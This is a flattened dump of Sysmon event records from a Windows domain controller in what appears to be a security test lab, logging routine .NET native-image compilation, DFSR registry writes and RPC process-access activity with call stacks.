10341000x80000000000000007486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:10.043{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D6-6005-3503-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:10.043{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D6-6005-3503-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:11.059{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:11.043{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:11.043{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:21.543{59A5CD1D-91D7-6005-3603-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1208-0\System.ServiceModel.dll2021-01-18 13:49:21.543 10341000x80000000000000007497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.527{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.527{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.058{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91E2-6005-3703-00000000A301}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.043{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91E2-6005-3703-00000000A301}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:22.043{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91E2-6005-3703-00000000A301}2960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:29.558{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91E9-6005-3903-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:29.542{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91E9-6005-3903-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:29.542{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91E9-6005-3903-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:29.214{59A5CD1D-91E2-6005-3803-00000000A301}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12c4-0\PresentationCore.dll2021-01-18 13:49:29.214 10341000x80000000000000007507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:30.402{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:30.386{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:30.386{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91EA-6005-3A03-00000000A301}4856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x80000000000000007504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:30.214{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000007503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:30.214{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000007502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:30.214{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x80000000000000007527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.745{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000007523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:39.636{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C: